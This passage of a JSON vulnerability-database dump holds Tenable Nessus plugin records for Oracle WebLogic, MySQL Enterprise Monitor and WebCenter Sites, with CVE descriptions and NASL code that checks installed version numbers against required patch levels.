Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:35", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10334", "CVE-2017-10336", "CVE-2017-10352"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/103935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103935);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2017-10152\",\n \"CVE-2017-10271\",\n \"CVE-2017-10334\",\n \"CVE-2017-10336\",\n \"CVE-2017-10352\"\n );\n script_bugtraq_id(101304, 101351, 101392);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.171017\";\n fix = \"26519424\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.171017\";\n fix = \"26519417\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.171017\";\n fix = \"26519400\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.171017\";\n fix = \"26485996\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required Patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:10:03", "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.7.8023, 3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache Commons component in the FileUpload functionality due to improper handling of file upload requests. An unauthenticated, remote attacker can exploit this, via a specially crafted content-type header, to cause a denial of service condition. Note that this vulnerability does not affect MySQL Enterprise Monitor versions 3.3.x.\n (CVE-2016-3092)\n\n - An unspecified flaw exists in the Apache Struts component that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436)\n\n - A carry propagation error exists in the OpenSSL component in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity.\n (CVE-2017-3306)\n\n - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact integrity and availability.\n (CVE-2017-3307)\n\n - An out-of-bounds read error exists in the OpenSSL component when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. (CVE-2017-3731)\n\n - A carry propagating error exists in the OpenSSL component in the x86_64 Montgomery squaring implementation that may cause the BN_mod_exp() function to produce incorrect results. An unauthenticated, remote attacker with sufficient resources can exploit this to obtain sensitive information regarding private keys.\n (CVE-2017-3732)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3092", "CVE-2016-4436", "CVE-2016-7055", "CVE-2017-3306", "CVE-2017-3307", "CVE-2017-3731", "CVE-2017-3732", "CVE-2017-5638"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "href": "https://www.tenable.com/plugins/nessus/99593", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99593);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3092\",\n \"CVE-2016-4436\",\n \"CVE-2016-7055\",\n \"CVE-2017-3306\",\n \"CVE-2017-3307\",\n \"CVE-2017-3731\",\n \"CVE-2017-3732\",\n \"CVE-2017-5638\"\n );\n script_bugtraq_id(\n 91280,\n 91453,\n 94242,\n 95813,\n 95814,\n 96729,\n 97724,\n 97844\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.1.x prior to 3.1.7.8023,\n3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache\n Commons component in the FileUpload functionality due to\n improper handling of file upload requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted content-type header, to cause a denial\n of service condition. Note that this vulnerability does\n not affect MySQL Enterprise Monitor versions 3.3.x.\n (CVE-2016-3092)\n\n - An unspecified flaw exists in the Apache Struts\n component that is triggered during the cleanup of action\n names. An unauthenticated, remote attacker can exploit\n this, via a specially crafted payload, to perform\n unspecified actions. (CVE-2016-4436)\n\n - A carry propagation error exists in the OpenSSL\n component in the Broadwell-specific Montgomery\n multiplication procedure when handling input lengths\n divisible by but longer than 256 bits. This can result\n in transient authentication and key negotiation failures\n or reproducible erroneous outcomes of public-key\n operations with specially crafted input. A\n man-in-the-middle attacker can possibly exploit this\n issue to compromise ECDH key negotiations that utilize\n Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified flaw exists in the Monitoring Server\n subcomponent that allows an authenticated, remote\n attacker to impact confidentiality and integrity.\n (CVE-2017-3306)\n\n - An unspecified flaw exists in the Monitoring Server\n subcomponent that allows an authenticated, remote\n attacker to impact integrity and availability.\n (CVE-2017-3307)\n\n - An out-of-bounds read error exists in the OpenSSL\n component when handling packets using the\n CHACHA20/POLY1305 or RC4-MD5 ciphers. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted truncated packets, to cause a denial\n of service condition. (CVE-2017-3731)\n\n - A carry propagating error exists in the OpenSSL\n component in the x86_64 Montgomery squaring\n implementation that may cause the BN_mod_exp() function\n to produce incorrect results. An unauthenticated, remote\n attacker with sufficient resources can exploit this to\n obtain sensitive information regarding private keys.\n (CVE-2017-3732)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. (CVE-2017-5638)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d679be85\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?50229a1a\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2244179.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2279658.1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.1.7.8023 / 3.2.7.1204 /\n3.3.3.1199 or later as referenced in the April 2017 Oracle Critical\nPatch Update advisory.\n\nNote that the 3.2.x version was fixed for the CVE-2016-4436\nvulnerability in version 3.2.6.1182.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = {\"^3.3\": \"3.3.3.1199\",\n \"^3.2\": \"3.2.7.1204\",\n \"^3.1\": \"3.1.7.8023\"};\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n { \n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:21:10", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities :\n\n - A flaw exists in Jython due to executable classes being created with insecure permissions. A local attacker can exploit this to bypass intended access restrictions and thereby disclose sensitive information or gain elevated privileges. (CVE-2013-2027)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)\n\n - An unspecified flaw exists in the Web Services component that allows an unauthenticated, remote attacker to have an impact on integrity and availability.\n (CVE-2017-10063)\n\n - An unspecified flaw exists in the Web Container component that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2017-10123)\n\n - An unspecified flaw exists in the JNDI component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-10137)\n\n - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-10147)\n\n - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to have an impact on integrity. (CVE-2017-10148)\n\n - An unspecified flaw exists in the Web Container component that allows an unauthenticated, remote attacker to have an impact on confidentiality and integrity. (CVE-2017-10178)", "cvss3": {}, "published": "2017-07-19T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2027", "CVE-2017-10063", "CVE-2017-10123", "CVE-2017-10137", "CVE-2017-10147", "CVE-2017-10148", "CVE-2017-10178", "CVE-2017-5638"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/101815", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101815);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2013-2027\",\n \"CVE-2017-5638\",\n \"CVE-2017-10063\",\n \"CVE-2017-10123\",\n \"CVE-2017-10137\",\n \"CVE-2017-10147\",\n \"CVE-2017-10148\",\n \"CVE-2017-10178\"\n );\n script_bugtraq_id(\n 78027,\n 96729,\n 99634,\n 99644,\n 99650,\n 99651,\n 99652,\n 99653\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities :\n\n - A flaw exists in Jython due to executable classes being\n created with insecure permissions. A local attacker can\n exploit this to bypass intended access restrictions and\n thereby disclose sensitive information or gain elevated\n privileges. (CVE-2013-2027)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. (CVE-2017-5638)\n\n - An unspecified flaw exists in the Web Services component\n that allows an unauthenticated, remote attacker to have\n an impact on integrity and availability.\n (CVE-2017-10063)\n\n - An unspecified flaw exists in the Web Container\n component that allows an authenticated, remote attacker\n to disclose sensitive information. (CVE-2017-10123)\n\n - An unspecified flaw exists in the JNDI component that\n allows an unauthenticated, remote attacker to execute\n arbitrary code. (CVE-2017-10137)\n\n - An unspecified flaw exists in the Core Components that\n allows an unauthenticated, remote attacker to cause a\n denial of service condition. (CVE-2017-10147)\n\n - An unspecified flaw exists in the Core Components that\n allows an unauthenticated, remote attacker to have an\n impact on integrity. (CVE-2017-10148)\n\n - An unspecified flaw exists in the Web Container\n component that allows an unauthenticated, remote\n attacker to have an impact on confidentiality and\n integrity. (CVE-2017-10178)\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76f5def7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.170718\";\n fix = \"25869650\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.170718\";\n fix = \"25869659\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.170718\";\n fix = \"25961827\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.170718\";\n fix = \"25871788\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:24:56", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple Apache Struts 2 vulnerabilities. One of the following vulnerabilities was detected on the asset:\n\n - CVE-2017-5638: The Jakarta Multipart parser in Apache Struts 2, specifically 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1\n - CVE-2017-7672: Apache Struts version < 2.5.12\n - CVE-2017-9787: Apache Struts version < 2.5.12 or < 2.3.33\n - CVE-2017-9791: Struts 1 plugin in Apache Struts 2.3.x\n - CVE-2017-9793: Apache Struts < 2.3.7 - 2.3.33 & < 2.5 - 2.5.12\n - CVE-2017-9804: Apache Struts 2.3.7 -2.3.33 & 2.5 - 2.5.12\n - CVE-2017-12611: Apache Struts 2.0.1 - 2.3.33 & 2.5 - 2.5.10", "cvss3": {}, "published": "2017-10-04T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "href": "https://www.tenable.com/plugins/nessus/103663", "sourceData": "Binary data oracle_weblogic_server_CVE-2017-9805.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:51:29", "description": "Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities.\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501)\n\n - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542)\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638)\n\nIn addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "nessus", "title": "Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2016-0714", "CVE-2017-3540", "CVE-2017-3541", "CVE-2017-3542", "CVE-2017-3543", "CVE-2017-3545", "CVE-2017-3554", "CVE-2017-3591", "CVE-2017-3593", "CVE-2017-3594", "CVE-2017-3595", "CVE-2017-3596", "CVE-2017-3597", "CVE-2017-3598", "CVE-2017-3602", "CVE-2017-3603", "CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/136998", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136998);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2016-0714\",\n \"CVE-2017-3540\",\n \"CVE-2017-3541\",\n \"CVE-2017-3542\",\n \"CVE-2017-3543\",\n \"CVE-2017-3545\",\n \"CVE-2017-3554\",\n \"CVE-2017-3591\",\n \"CVE-2017-3593\",\n \"CVE-2017-3594\",\n \"CVE-2017-3595\",\n \"CVE-2017-3596\",\n \"CVE-2017-3597\",\n \"CVE-2017-3598\",\n \"CVE-2017-3602\",\n \"CVE-2017-3603\",\n \"CVE-2017-5638\"\n );\n script_xref(name:\"IAVA\", value:\"2017-A-0113-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple security vulnerabilities.\");\n 